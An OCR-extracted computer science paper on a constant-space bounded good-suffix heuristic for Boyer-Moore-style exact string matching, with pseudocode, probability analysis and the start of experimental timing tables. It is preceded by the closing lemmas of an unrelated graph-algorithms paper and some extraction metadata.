3. Upon invoking \( \text{Backtrack-From}(v) \), if \( v \) is the source of cycles \( C_1, C_2, \ldots, C_n \), then no descendant of \( v \), except perhaps for those on some \( C_i \) \((1 \leq i \leq n)\), is a fork or on a cycle. Hence, for \( 1 \leq i \leq n \), \( C_i \) is either an end-cycle or contains a fork.
4. If \( v \) is the source of cycles \( C_1, C_2, \ldots, C_n \) upon invoking \( \text{Backtrack-From}(v) \), then on completion of \( \text{Backtrack-From}(v) \), no descendant of \( v \) is a fork or on a cycle.
5. Each edge \( e \in E_G \) is scanned a constant number of times (twice by the EDFS, at most once by the re-traversal, and at most twice by either the elimination process or the covering of the final even-trailed end-cycles).
References
Figure 1. A Cactus (reproduced from [1])
Figure 2. End-cycles
Figure 3. The superstructure of Lemma 2
Figure 4. The new cover of Lemma 4
Figure 5. Definition of $G|C$
|
olmocr_science_pdfs
|
2024-11-28
|
2024-11-28
|
7785109a82ce4c4dcde47e8425a28bf116817a19
|
A Space-Efficient Implementation of the Good-Suffix Heuristic
Domenico Cantone, Salvatore Cristofaro, and Simone Faro
Università di Catania, Dipartimento di Matematica e Informatica
Viale Andrea Doria 6, I-95125 Catania, Italy
{cantone | cristofaro | faro}@dmi.unict.it
Abstract. We present an efficient variation of the good-suffix heuristic, first introduced in the well-known Boyer-Moore algorithm for the exact string matching problem. Our proposed variant uses only constant space, retaining much the same time efficiency as the original rule, as shown by extensive experimentation.
Key words: string matching, experimental algorithms, text-processing, good-suffix rule, constant-space algorithms.
1 Introduction
Given a text $T$ and a pattern $P$ (of length $m$) over some alphabet $\Sigma$, the string matching problem consists in finding all occurrences of the pattern $P$ in the text $T$. It is a very extensively studied problem in computer science, mainly due to its direct applications to such diverse areas as text, image and signal processing, speech analysis and recognition, information retrieval, computational biology and chemistry, etc.
The most practical string matching algorithms show a sublinear behavior in practice, at the price of using extra memory of non-constant size to maintain auxiliary information. For instance, the Boyer-Moore algorithm [2] requires additional $O(m+|\Sigma|)$-memory to compute two tables of shifts, which implement the well-known good-suffix and bad-character heuristics. Other efficient variants of the Boyer-Moore algorithm use additional $O(m)$-space [7], or $O(|\Sigma|)$-space [14, 18], whereas, interestingly enough, two of the fastest algorithms require respectively $O(|\Sigma|^2)$-space [1] and $O(m \cdot |\Sigma|)$-space [5].
The first non-trivial constant-space string matching algorithm is due to Galil and Seiferas [10]. Their algorithm, though linear in the worst-case, was too complicated to be of any practical interest. Slightly more efficient constant-space algorithms have been subsequently reported in the literature (see [3, 8, 9, 11, 12]), and more recently two new constant-space algorithms have been presented, which have a sublinear average behavior though they are quadratic in the worst-case [6]. It is to be pointed out, though, that no constant-space algorithm which is competitive with the most efficient variants of the Boyer-Moore algorithm is known as yet.
Starting from the observation that most of the accesses to the good-suffix table are limited to very few locations, in this paper we propose a truncated good-suffix heuristic which requires only constant space, and we show by extensive experimentation that the Boyer-Moore algorithm and two of its more effective variants maintain much the same running times when the truncated variant is used in place of the classical one.
The paper is organized as follows. In Section 2 we give some preliminary notions. Then, in Section 3 we describe the preprocessing techniques introduced in the Boyer-Moore algorithm together with some efficient variants which make use of the same shift heuristics. In Section 4 we estimate the probability that a given entry of a good-suffix table is accessed and, based on such analysis, we come up with the proposal to memorize only a constant number of entries. We also show how such entries can be computed in constant-space. Subsequently, in Section 5 we present the experimental data obtained by running under various conditions the algorithms reviewed, and their modified versions. Such results confirm experimentally that by truncating the good-suffix table much the same running times are maintained. Finally, our conclusions are given in Section 6.
2 Preliminaries
Before entering into details, we need a bit of notations and terminology. A string $P$ is represented as a finite array $P[0..m-1]$, with $m \geq 0$. In such a case we say that $P$ has length $m$ and write $\text{length}(P) = m$. In particular, for $m = 0$ we obtain the empty string, also denoted by $\varepsilon$. By $P[i]$ we denote the $(i+1)$-st character of $P$, for $0 \leq i < \text{length}(P)$. Likewise, by $P[i..j]$ we denote the substring of $P$ contained between the $(i+1)$-st and the $(j+1)$-st characters of $P$, where $0 \leq i \leq j < \text{length}(P)$. Moreover, for any $i, j \in \mathbb{Z}$, we put $P[i..j] = \varepsilon$ if $i > j$, and $P[i..j] = P[\max(i, 0) .. \min(j, \text{length}(P) - 1)]$ otherwise.
For any two strings $P$ and $P'$, we write $P' \sqsupset P$ to indicate that $P'$ is a suffix of $P$, i.e., $P' = P[i..\text{length}(P) - 1]$, for some $0 \leq i < \text{length}(P)$. Similarly, we write $P' \sqsubset P$ to indicate that $P'$ is a prefix of $P$, i.e., $P' = P[0..i-1]$, for some $0 \leq i \leq \text{length}(P)$. In addition, we denote by $P^R$ the reverse of the string $P$.
Let $T$ be a text of length $n$ and let $P$ be a pattern of length $m$. If the character $P[0]$ is aligned with the character $T[s]$ of the text, so that $P[i]$ is aligned with $T[s+i]$, for $i = 0, \ldots, m-1$, we say that the pattern $P$ has shift $s$ in $T$. In this case the substring $T[s..s+m-1]$ is called the current window of the text. If $T[s..s+m-1] = P$, we say that the shift $s$ is valid.
Most string matching algorithms have the following general structure:
\begin{verbatim}
Generic_String_Matcher(T, P)
1. Precompute_Globals(P)
2. n := length(T)
3. m := length(P)
4. s := 0
5. while $s \leq n - m$ do
6. j := Check_Shift(s, P, T)
7. s := s + Shift_Increment(s, P, T, j)
\end{verbatim}
where
- the procedure $\text{Precompute_Globals}(P)$ computes useful mappings, in the form of tables, which later may be accessed by the function $\text{Shift_Increment}(s, P, T)$;
- the function $\text{Check_Shift}(s, P, T)$ checks whether $s$ is a valid shift and returns the position $j$ of the last matched character in the pattern;
- the function $\text{Shift\_Increment}(s, P, T, j)$ computes a positive shift increment according to the information tabulated by procedure $\text{Precompute\_Globals}(P)$ and to the position $j$ of the last matched character in the pattern.
Observe that for the correctness of procedure $\text{Generic\_String\_Matcher}$, it is plainly necessary that the shift increment $\Delta s$ computed by $\text{Shift\_Increment}(s, P, T, j)$ be safe, namely no valid shift may belong to the interval $\{s + 1, \ldots, s + \Delta s - 1\}$.
In the case of the naive string matching algorithm, for instance, the procedure $\text{Precompute\_Globals}$ is just dropped, procedure $\text{Check\_Shift}(s, P, T)$ checks whether the current shift is valid by scanning the pattern from left to right, and the function $\text{Shift\_Increment}(s, P, T, j)$ always returns a unitary shift increment.
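For concreteness, the naive algorithm just described can be written out as an instance of this scheme (a minimal C sketch of ours, not code from the paper; the function name and signature are our own choices):

```c
#include <stddef.h>
#include <string.h>

/* Naive string matcher: reports every valid shift of P in T via
 * report(s) (which may be NULL) and returns the number of valid
 * shifts.  Check_Shift scans left to right; Shift_Increment is
 * always 1. */
static int naive_match(const char *T, const char *P,
                       void (*report)(int s)) {
    int n = (int)strlen(T), m = (int)strlen(P), count = 0;
    for (int s = 0; s + m <= n; s++) {     /* unit shift increments */
        int j = 0;
        while (j < m && P[j] == T[s + j])  /* left-to-right check */
            j++;
        if (j == m) {                      /* s is a valid shift */
            count++;
            if (report) report(s);
        }
    }
    return count;
}
```

All the variants discussed below keep this outer loop and differ only in how the shift increment is computed.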
3 The good-suffix heuristic for preprocessing
Information gathered during the execution of the $\text{Shift\_Increment}(s, P, T, j)$ function, in combination with the knowledge of $P$, as suitably extracted by procedure $\text{Precompute\_Globals}(P)$, can yield shift increments larger than 1 and ultimately lead to more efficient algorithms. In this section we focus our attention on the use of the good-suffix heuristic for preprocessing the pattern, introduced by Boyer and Moore in their celebrated algorithm [2].
The Boyer-Moore algorithm is the progenitor of several algorithmic variants which aim at computing close to optimal shift increments very efficiently. Specifically, the Boyer-Moore algorithm checks whether $s$ is a valid shift by scanning the pattern $P$ from right to left and, at the end of the matching phase, it calls procedure $\text{Boyer-Moore\_Shift\_Increment}(s, P, T, j)$ to compute the shift increment, where $j$ is the position of the last matched character in the pattern. Such procedure computes the shift increment as the maximum of the values suggested by the good-suffix and the bad-character heuristics below, using the functions $gs_P$ and $bc_P$ respectively, provided that both of them are applicable.
$$\text{Boyer-Moore\_Shift\_Increment}(s, P, T, j)$$
1. if $j > 0$ then
2. return $\max(gs_P(j), j - bc_P(T[s + j - 1]) - 1)$
3. return $gs_P(0)$
Let us briefly review the shifting strategy of the good-suffix and the bad-character heuristics.
If the last matching character occurs at position $j$ of the pattern $P$, the good-suffix heuristic suggests to align the substring $T[s + j .. s + m - 1] = P[j .. m - 1]$ with its rightmost occurrence in $P$ (preceded by a character different from $P[j - 1]$, provided that $j > 0$); this case is illustrated in Fig. 1A. If such an occurrence does not exist, the good-suffix heuristic suggests a shift increment which allows to match the longest suffix of $T[s + j .. s + m - 1]$ with a prefix of $P$; see Fig. 1B.
More formally, if the last matching character occurs at position $j$ of the pattern $P$, the good-suffix heuristic states that the shift can be safely incremented by $gs_P(j)$ positions, where
$$gs_P(i) = \min \{0 < k \leq m \mid P[i - k .. m - k - 1] \sqsupseteq P \wedge (k \leq i - 1 \rightarrow P[i - 1] \neq P[i - 1 - k])\},$$
Figure 1. The good-suffix heuristic. Assuming that the suffix $u = P[i+1..m-1]$ of the pattern $P$ has a match on the text $T$ at shift $s$ and that $P[i] \neq T[s+i]$, then the good-suffix heuristic attempts to align the substring $T[s+i+1..s+m-1] = P[i+1..m-1]$ with its rightmost occurrence in $P$ preceded by a character different from $P[i]$ (see (A)). If this is not possible, the good-suffix heuristic suggests a shift increment corresponding to the match between the longest suffix of $u$ with a prefix, $v$, of $P$ (see (B)).
for $i = 0, 1, \ldots, m$.
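The definition above can also be evaluated literally, which is handy for checking faster preprocessing routines against it (a quadratic C sketch of ours, applying the clamping convention for $P[i..j]$ from Section 2; this is for illustration only and is not the linear-time preprocessing the paper refers to):

```c
#include <string.h>

/* Is P[lo..hi] (with the clamping convention of Section 2,
 * i.e. empty whenever lo > hi after clamping) a suffix of P? */
static int clamped_is_suffix(const char *P, int m, int lo, int hi) {
    if (lo < 0) lo = 0;
    if (hi > m - 1) hi = m - 1;
    if (lo > hi) return 1;            /* empty string: trivially a suffix */
    int len = hi - lo + 1;
    return memcmp(P + lo, P + (m - len), (size_t)len) == 0;
}

/* Brute-force evaluation of gs_P(i), 0 <= i <= m, from the definition:
 * the least 0 < k <= m such that P[i-k..m-k-1] is a suffix of P and,
 * whenever k <= i-1, P[i-1] != P[i-1-k]. */
static int gs_brute(const char *P, int i) {
    int m = (int)strlen(P);
    for (int k = 1; k <= m; k++) {
        if (!clamped_is_suffix(P, m, i - k, m - k - 1)) continue;
        if (k <= i - 1 && P[i - 1] == P[i - 1 - k]) continue;
        return k;
    }
    return m;                         /* unreachable: k = m always qualifies */
}
```

For $P = \texttt{abcab}$ this gives, e.g., $gs_P(3) = 3$ (align the prefix $\texttt{ab}$ with the matched suffix $\texttt{ab}$) and $gs_P(5) = 1$.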
The bad-character heuristic states that if $c = T[s+j-1] \neq P[j-1]$ is the first mismatching character, while scanning $P$ and $T$ from right to left with shift $s$, then $P$ can be safely shifted in such a way that its rightmost occurrence of $c$, if present, is aligned with position $(s+j-1)$ in $T$. In the case in which $c$ does not occur in $P$, then $P$ can safely be shifted just past position $(s+j-1)$ in $T$. More formally, the shift increment suggested by the bad-character heuristic is given by the expression $(j - bc_P(T[s+j-1]) - 1)$, where
$$bc_P(c) =_{\text{Def}} \max(\{0 \leq k < m \mid P[k] = c\} \cup \{-1\}),$$
for $c \in \Sigma$, and where we recall that $\Sigma$ is the alphabet of the pattern $P$ and text $T$. Notice that in some situations the shift increment proposed by the bad-character heuristic may be negative.
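The table $bc_P$ itself is filled by a single left-to-right pass, in $O(m + |\Sigma|)$ time and $O(|\Sigma|)$ space (a C sketch of ours, assuming a byte alphabet; the macro name is our own):

```c
#include <string.h>

#define SIGMA 256  /* byte alphabet: an assumption of this sketch */

/* Fill bc[c] with the rightmost position of c in P, or -1 if c
 * does not occur in P. */
static void build_bc(const char *P, int bc[SIGMA]) {
    int m = (int)strlen(P);
    for (int c = 0; c < SIGMA; c++)
        bc[c] = -1;                  /* default: character absent */
    for (int k = 0; k < m; k++)      /* later k overwrite earlier ones */
        bc[(unsigned char)P[k]] = k;
}
```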
It turns out that the functions $gs_P$ and $bc_P$ can be computed during the preprocessing phase in time $O(m)$ and $O(m + |\Sigma|)$ and space $O(m)$ and $O(|\Sigma|)$, respectively, and that the overall worst-case running time of the Boyer-Moore algorithm, as described above, is linear (cf. [13]).
Due to the simplicity and ease of implementation of the bad-character heuristic, some variants of the Boyer-Moore algorithm have focused just around it and dropped the good-suffix heuristic. This is the case, for instance, of the Horspool algorithm [14], which computes shift advancements by aligning the rightmost character $T[s+m-1]$ with its rightmost occurrence on $P[0..m-2]$, if present; otherwise it shifts the pattern just past the current window.
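The Horspool rule just described can be sketched as follows (illustrative C of ours; to keep the example short it returns only the first valid shift rather than reporting all of them):

```c
#include <string.h>

#define HSIGMA 256  /* byte alphabet: an assumption of this sketch */

/* Horspool: after each attempt, shift so that T[s+m-1] aligns with
 * its rightmost occurrence in P[0..m-2]; if absent, shift by m.
 * Returns the first valid shift, or -1 if there is none. */
static int horspool_first(const char *T, const char *P) {
    int n = (int)strlen(T), m = (int)strlen(P);
    int shift[HSIGMA];
    for (int c = 0; c < HSIGMA; c++)
        shift[c] = m;                        /* default: past the window */
    for (int k = 0; k < m - 1; k++)          /* last character excluded */
        shift[(unsigned char)P[k]] = m - 1 - k;
    for (int s = 0; s + m <= n; ) {
        if (memcmp(T + s, P, (size_t)m) == 0)
            return s;
        s += shift[(unsigned char)T[s + m - 1]];
    }
    return -1;
}
```

Excluding $P[m-1]$ when filling the table guarantees every shift is at least 1.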
Similarly the Quick-Search algorithm [18] uses a modification of the original heuristics of the Boyer-Moore algorithm, much along the same lines of the Horspool algorithm. Specifically, it is based on the observation that the character $T[s+m]$ is always involved in testing for the next alignment, so that one can apply the bad-character heuristic to $T[s+m]$, rather than to the mismatching character, obtaining larger shift advancements.
A further example is given by the Berry-Ravindran algorithm [1], which extends the Quick-Search algorithm by using in the bad-character heuristic also the character $T[s+m+1]$ in addition to $T[s+m]$. In this case, the table used by the bad-character heuristic requires $O(|\Sigma|^2)$-space and $O(m + |\Sigma|^2)$-time complexity.
Experimental results show that the Berry-Ravindran algorithm is fast in practice and performs a low number of text/pattern character comparisons and that the Quick-Search algorithm is very fast especially for short patterns (cf. [16]).
The role of the good-suffix heuristic in practical string matching algorithms has recently been reappraised, also in consideration of the fact that often it is as effective as the bad-character heuristic, especially in the case of non-periodic patterns.
This is the case of the Fast-Search algorithm [4], a very simple, yet efficient, variant of the Boyer-Moore algorithm. The Fast-Search algorithm computes its shift increments by applying the bad-character heuristic if and only if a mismatch occurs during the first character comparison, namely, while comparing characters $P[m-1]$ and $T[s+m-1]$, where $s$ is the current shift. In all other cases it uses the good-suffix heuristic. This translates in the following pseudo-code:
```
Fast-Search(s, P, T, j)
1. m := length(P)
2. if j = m - 1 then
3.    return bc_P(T[s + m - 1])
4. else
5.    return gs_P(j)
```
A more effective implementation of the Fast-Search algorithm is obtained by iterating the bad-character heuristic until the last character $P[m-1]$ of the pattern is matched correctly against the text, at which point it is known that $T[s+m-1] = P[m-1]$, so that the subsequent matching phase can start with the $(m-2)$-nd character of the pattern. At the end of the matching phase the good-suffix heuristic is applied to compute the shift increment.
Another example is the Forward-Fast-Search algorithm [5], which maintains the same structure of the Fast-Search algorithm, but is based upon a modified version of the good-suffix heuristic, called forward good-suffix heuristic, which uses a look-ahead character to determine larger shift advancements. More precisely, if the last matching character occurs at position $j \leq m - 1$ of the pattern $P$, the forward good-suffix heuristic suggests to align the substring $T[s+j..s+m-1]$ with its rightmost occurrence in $P$ preceded by a character different from $P[j-1]$. If such an occurrence does not exist, the forward good-suffix heuristic proposes a shift increment which allows to match the longest suffix of $T[s+j..s+m-1]$ with a prefix of $P$. This corresponds to advancing the shift $s$ by $\overline{gs}_P(j, T[s+m])$ positions, where
$$\overline{gs}_P(i, c) =_{\text{Def}} \min(\{0 < k \leq m \mid P[i-k..m-k-1] \sqsupseteq P \wedge (k < i - 1 \rightarrow P[i-1] \neq P[i-1-k]) \wedge P[m-k] = c \} \cup \{m+1\}),$$
for $i = 0, 1, \ldots, m$ and $c \in \Sigma$.
The forward good-suffix heuristic requires a table of size $m \cdot |\Sigma|$ which can be constructed in time $O(m \cdot \max(m, |\Sigma|))$.
Experimental results show that both the Fast-Search and the Forward-Fast-Search algorithms, though not linear, achieve very good results especially in the case of very short patterns or small alphabets.
4 Truncating the Good-Suffix Tables
Let us assume that we run the Boyer-Moore algorithm on a pattern \( P \) and a text \( T \). Then, at the end of each matching phase, the Boyer-Moore algorithm accesses the entry at position \( j > 0 \) in the good-suffix table if and only if the last matched character in the pattern occurs at position \( j \) of the pattern, i.e. if \( P[j..m-1] = T[s+j..s+m-1] \) and \( P[j-1] \neq T[s+j-1] \), where \( s \) is the current shift. Likewise, the Boyer-Moore algorithm accesses the entry at position \( j = 0 \) if and only if \( P[0..m-1] = T[s..s+m-1] \), i.e. if and only if \( s \) is a valid shift.
Therefore, it is intuitively expected that the probability of accessing the entry at position $j$ of the good-suffix table becomes higher as the value of $j$ increases. In other words, entries on the right-hand side of the good-suffix table are expected to have (much) higher probability of being accessed than entries on the left-hand side.
The above considerations, which will be formalized below under suitable simplifying hypotheses, suggest that the initial segment of the good-suffix tables can be dropped, without affecting very much the performance of the algorithm. In fact, we will see that in most cases, it is enough to maintain just a few entries of the good-suffix tables.
For the sake of simplicity, in the following analysis we will assume that the text \( T \) and pattern \( P \) are strings over a common alphabet \( \Sigma \) of size \( \sigma \), randomly selected relatively to a uniform distribution.
Thus, for a shift \( 0 \leq s \leq n - m \) in \( T \) and a position \( 0 \leq j < m \) in \( P \), the probability that \( P[j] = T[s+j] \) is \( 1/\sigma \), whereas the probability that \( P[j] \neq T[s+j] \) is \((\sigma - 1)/\sigma\).
Therefore, the probability \( p_j \) that \( j \) is the position of the last matched character in the pattern \( P \), relatively to a shift \( s \) of the text, is given by
\[
p_j = \begin{cases}
\frac{\sigma - 1}{\sigma^{m-j+1}} & \text{if } 0 < j \leq m \\
1/\sigma^m & \text{if } j = 0
\end{cases}
\]
Plainly, \( p_j \) is also the probability that location \( j \) of the good-suffix table is accessed.
As experimental evidence of the above analysis, we report in Fig. 2 the plots of the accesses to each entry of the good-suffix table, for different sizes of the alphabet, when running the Fast-Search algorithm with a set of 200 patterns of length 40 and a 20Mb text buffer as input. More precisely, for each function \( f \) in Fig. 2, \( f(j) \) is the percentage of accesses to the entry at position \( m - j \) in the good-suffix table. We can observe that, in general, only a very small number of entries is really used during a computation and, in particular, when the alphabet size is greater than or equal to 16 about 98% of the accesses are limited to the last three entries of the table.
We can readily evaluate the number \( K_{\sigma,\beta} \) of entries of the good-suffix table which are accessed with probability greater than a fixed threshold \( 0 < \beta < 1 \), for an alphabet of size \( \sigma \). To begin with, notice that if \( p_j > \beta \), then \( \frac{\sigma - 1}{\sigma^{m-j+1}} > \beta \), so that
\[
j > m + 1 - \log_\sigma \frac{\sigma - 1}{\beta}, \quad \text{and hence} \quad K_{\sigma,\beta} \leq \left\lfloor \log_\sigma \frac{\sigma - 1}{\beta} \right\rfloor - 1.
\]
Observe that for \( \bar{\beta} = 10^{-4} \), we have \( K_{\sigma,\bar{\beta}} \leq 12 \). Additionally, we have \( K_{\sigma,\bar{\beta}} \leq 3 \), for \( 14 \leq \sigma \leq 39 \), and \( K_{\sigma,\bar{\beta}} \leq 2 \), for \( \sigma \geq 40 \). In other words, for alphabets of at least 14 characters, at most the last three entries of the good-suffix table are accessed with probability at least \( 10^{-4} \) (under the assumption of uniform distribution).
Figure 2. The percentage of accesses for each entry of the good-suffix heuristic, for different sizes of the alphabet. The values have been computed by running the Fast-Search algorithm with a set of 200 patterns, of length 40, and a 20Mb text buffer as input. The values in each curve \( f \) are relative to the inverted addressing of the entries, i.e. \( f(j) \) is the percentage of accesses to the entry at position \( m - j \).
Figure 3. The function \( \left\lfloor \log_\sigma \frac{\sigma - 1}{\beta} \right\rfloor - 1 \), for different values of the bound \( \beta \).
Fig. 3 shows the shape of this function for the values of the bound \( \beta = 10^{-3}, 10^{-4}, \ldots, 10^{-10} \). Note that if the bound \( \beta \) is greater than or equal to \( 10^{-4} \), then the number of entries accessed with probability greater than \( \beta \) is never greater than 12 and in most cases no greater than 3.
4.1 The Bounded-Good-Suffix Heuristic
The above considerations justify the following bounded good-suffix heuristic. Let $\beta > 0$ be a fixed bound\(^1\) and let $K = \left\lceil \log_\sigma \frac{\sigma - 1}{\beta} \right\rceil - 1$, where, as usual, $\sigma$ denotes the size of the alphabet. Then the bounded good-suffix heuristic works as follows.
During a matching phase, if the first mismatch occurs at position $i$ of the pattern $P$ and $i \geq m - K$, the bounded good-suffix heuristic suggests that the pattern is shifted $gs_P(i + 1)$ positions to the right. Otherwise, if the first mismatch occurs at position $i$ of the pattern $P$, with $i < m - K$, or if the pattern $P$ matches the current window in the text, then the bounded good-suffix heuristic suggests that the pattern is shifted one position to the right.
More formally, if the first mismatch occurs at position $i$ of the pattern $P$, the bounded good-suffix heuristic suggests that the shift $s$ can be safely advanced by $\beta gs_P(i - m + K)$ positions to the right, where, for $j = K - m - 1, \ldots, K - 1$, we have
$$
\beta gs_P(j) = \begin{cases}
gs_P(j + m - K + 1) & \text{if } j \geq 0 \\
1 & \text{otherwise}
\end{cases}
$$
Likewise, the bounded forward good-suffix heuristic suggests that when the first mismatch occurs at position $i$ of the pattern $P$, then the shift $s$ is advanced by $\overline{\beta gs}_P(i - m + K, T[s + m])$ positions to the right, where, for $j = K - m - 1, \ldots, K - 1$ and $c \in \Sigma$, we have
$$
\overline{\beta gs}_P(j, c) = \begin{cases}
\overline{gs}_P(j + m - K + 1, c) & \text{if } j \geq 0 \\
1 & \text{otherwise}
\end{cases}
$$
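In other words, $\beta gs_P$ is just the last $K$ entries of $gs_P$ together with a default shift of 1. The relationship can be made explicit by deriving it from a brute-force $gs_P$ (an illustrative C sketch of ours; the point of this section is of course that in practice these $K$ entries are computed without ever materializing the full table):

```c
#include <string.h>

/* Brute-force gs_P(i) from the definition in Section 3, using the
 * clamping convention for P[lo..hi]; quadratic, illustration only. */
static int gs_full(const char *P, int i) {
    int m = (int)strlen(P);
    for (int k = 1; k <= m; k++) {
        int lo = i - k, hi = m - k - 1, ok;
        if (lo < 0) lo = 0;
        if (lo > hi)
            ok = 1;                        /* empty substring: a suffix */
        else
            ok = memcmp(P + lo, P + m - (hi - lo + 1),
                        (size_t)(hi - lo + 1)) == 0;
        if (!ok) continue;
        if (k <= i - 1 && P[i - 1] == P[i - 1 - k]) continue;
        return k;
    }
    return m;
}

/* Bounded good-suffix lookup: gs_P(j + m - K + 1) for j >= 0, else 1. */
static int beta_gs(const char *P, int K, int j) {
    int m = (int)strlen(P);
    if (j >= 0)
        return gs_full(P, j + m - K + 1);
    return 1;                              /* truncated entries default to 1 */
}
```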
By way of example, when the bounded good-suffix heuristic is adopted in place of the good-suffix heuristic, the $\text{Shift\_Increment}$ procedure of the Boyer-Moore algorithm becomes:
\begin{verbatim}
\beta-Boyer-Moore\_Shift\_Increment(s, P, T, j, \sigma, \beta)
1. m := length(P)
2. K := \left\lceil \log_\sigma \frac{\sigma - 1}{\beta} \right\rceil - 1
3. if j \geq m - K - 1 then
4.    if j > 0 then
5.       return \max(\beta gs_P(j - m + K - 1), j - bc_P(T[s + j - 1]) - 1)
6.    else return \beta gs_P(0)
7. else if j > 0 then
8.    return \max(1, j - bc_P(T[s + j - 1]) - 1)
9. else return 1
\end{verbatim}
Next we discuss how the bounded good-suffix function $\beta g_{SP}$ can be constructed (analogous remarks apply for the bounded forward good-suffix function). A first very natural way to compute the function $\beta g_{SP}$ consists in computing a slightly modified version of the standard good-suffix function $g_{SP}$, and then keeping only the last $K$ entries of the function. However such procedure, based on the one firstly given in [2] and later corrected in [17], has $O(m)$-time and space complexity.
An alternative way to compute the bounded good-suffix function using only constant space, but still in $O(m)$ worst-case time, is given by procedure $\text{Precompute\_\beta gs}$, whose pseudo-code is presented below:
\(^1\) A good practical choice is $\beta = 10^{-4}$, as shown in Section 5.
Precompute\_βgs(P, σ, β)
1. \( m := \text{length}(P) \)
2. \( K := \left\lceil \log_\sigma \frac{\sigma - 1}{\beta} \right\rceil - 1 \)
3. for \( \ell := 0 \) to \( K - 1 \) do
4. \( j := m - 2 \)
5. repeat
6. \( q := j - \text{occur}((P[m-\ell..m-1])^R, (P[0..j])^R) \)
7. \( j := q - 1 \)
8. until \( q < \ell \) or \( P[m-\ell - 1] \neq P[q-\ell] \)
9. \( \beta gs_P(K - \ell - 1) := m - q - 1 \)
10. return \( \beta gs_P \)
First of all, we give the specification of the function \( \text{occur} \), which is called by procedure \( \text{Precompute\_βgs} \). Given two strings \( X \) and \( Y \), \( \text{occur}(X, Y) \) computes the leftmost occurrence of \( X \) in \( Y \), i.e.,
\[
\text{occur}(X, Y) = \min(\{ p \geq 0 \mid Y[p..p+|X|-1] = X \} \cup \{|Y|\}).
\]
Observe that the function \( \text{occur}(X, Y) \) can be computed by means of a linear-time string matching algorithm such as the Knuth-Morris-Pratt algorithm [15], thus requiring \( O(|X| + |Y|) \)-time and \( O(|X|) \) additional space.
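For reference, the specification of occur admits a direct quadratic implementation (a C sketch of ours; the paper instead uses Knuth-Morris-Pratt to obtain the linear bound):

```c
#include <string.h>

/* Leftmost occurrence of X in Y, or length(Y) if X does not occur. */
static int occur(const char *X, const char *Y) {
    int lx = (int)strlen(X), ly = (int)strlen(Y);
    for (int p = 0; p + lx <= ly; p++)
        if (memcmp(Y + p, X, (size_t)lx) == 0)
            return p;
    return ly;                        /* sentinel value: |Y| */
}
```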
We are now ready to explain how the procedure \( \text{Precompute\_βgs} \) works.
For \( \ell = 0, 1, \ldots, K - 1 \), the \( \ell \)-th iteration of the \( \text{for}\)-loop in line 3 finds the rightmost occurrence, \( P[q - \ell + 1..q] \), in \( P \) of its suffix of length \( \ell \) preceded by a character different from \( P[m - \ell - 1] \). If such an occurrence does not exist, the \( \ell \)-th iteration finds the rightmost position \( q < \ell \) in the pattern such that \( P[0..q] = P[m - q - 1..m - 1] \). More precisely, the search is performed within the \( \text{repeat}\)-loop in line 5, by means of repeated calls of type \( \text{occur}((P[m - \ell..m - 1])^R, (P[0..j])^R) \), each of which looks for the leftmost occurrence of the reverse of \( P[m - \ell..m - 1] \) in the reverse of \( P[0..j] \). When such an occurrence is found at position \( q \), so that \( P[q - \ell + 1..q] \) is a suffix of \( P \), it is checked whether \( q < \ell \) holds or whether the character \( P[m - \ell - 1] \) is different from \( P[q - \ell] \). If any of such conditions is true, the \( \text{repeat}\)-loop stops, whereas if both conditions are false, another iteration is performed with \( j = q - 1 \).
The value \( q \), discovered during the \( \ell \)-th iteration of the \( \text{for}\)-loop in line 3, is then used in line 9 to set the \( (K - \ell - 1) \)-th entry of the \( \beta_{gs} \) function to \( m - q - 1 \).
Concerning the time and space analysis of the procedure \( \text{Precompute\_βgs} \), notice that each iteration of the \( \text{for}\)-loop, for \( \ell = 0, 1, \ldots, K - 1 \), takes \( O(K + m) \)-time, using only \( O(K) \)-space. Indeed, each call \( \text{occur}((P[m-\ell..m-1])^R, (P[0..j])^R) \) in the \( \text{repeat}\)-loop takes time proportional to \( j - r \), where \( r = \text{occur}((P[m-\ell..m-1])^R, (P[0..j])^R) \), and uses \( O(\ell) \) (reusable) space. Additionally, after each such call, the value of \( j \) is decreased by \( r + 1 \). Hence, the overall running time of all calls to the function \( \text{occur} \) made in the \( \text{repeat}\)-loop is bounded by \( O(K + m) \), for each iteration of the \( \text{for}\)-loop.
Since the number of iterations in the \( \text{for}\)-loop is \( K \), the overall running time of the procedure \( \text{Precompute\_βgs} \) is \( O(K^2 + Km) \).
Notice that if we fix the value of \( \beta = 10^{-4} \), then we have \( K \leq 12 \), as observed just before Section 4.1. Therefore, in such a case, the time and space complexity of the procedure \( \text{Precompute\_βgs} \) are \( O(m) \) and \( O(1) \), respectively.\(^2\)
\(^2\) As will be shown in Section 5, the choice \( \beta = 10^{-4} \) has very good practical results.
5 Experimental Results
To evaluate experimentally the impact of the bounded good-suffix heuristic, we have chosen to test it with the Boyer-Moore algorithm (in short, BM) and with two of its fastest variants in practice, namely the Fast-Search (FS) and the Forward-Fast-Search (FFS) algorithms. Their modified versions, obtained by using the bounded good-suffix heuristic in place of the good-suffix heuristic (in the case of the Boyer-Moore and the Fast-Search algorithms) and the bounded forward good-suffix heuristic in place of the forward good-suffix heuristic (in the case of the Forward-Fast-Search algorithm), are respectively denoted in short by $\beta$BM, $\beta$FS, and $\beta$FFS.
All algorithms have been implemented in the C programming language and were used to search for the same strings in large fixed text buffers on a PC with AMD Athlon processor of 1.19GHz. In particular, all algorithms have been tested on seven Rand$\sigma$ problems, for $\sigma = 2, 4, 8, 16, 32, 64, 128$, with patterns of length $m = 2, 4, 6, 8, 10, 20, 40, 80$ and $160$, and on two real data problems.
Each Rand$\sigma$ problem consists in searching a set of 200 random patterns of a given length in a 20Mb random text over a common alphabet of size $\sigma$.
The tests on the real data problems have been performed on a 180Kb natural language text file, containing the “Hamlet” by William Shakespeare (NL), and on a 2.4Mb file containing a protein sequence from the human genome. In both cases, the patterns to be searched for have been constructed by selecting 200 random substrings of length $m$ from the files, for each $m = 2, 4, 6, 8, 10, 20, 40, 80$ and $160$.
For the implementation of the bounded versions of the (forward) good-suffix heuristic we have used the bound $\beta = 10^{-4}$.
With the exception of the last two tables, in which running times are expressed in thousandths of seconds, all running times in the tables below are expressed in hundredths of seconds.
<table>
<thead>
<tr>
<th>$\sigma = 2$</th>
<th>2</th>
<th>4</th>
<th>6</th>
<th>8</th>
<th>10</th>
<th>20</th>
<th>40</th>
<th>80</th>
<th>160</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>BM</strong></td>
<td>46.82</td>
<td>39.77</td>
<td>31.51</td>
<td>25.89</td>
<td>21.23</td>
<td>19.93</td>
<td>19.56</td>
<td>17.56</td>
<td>15.64</td>
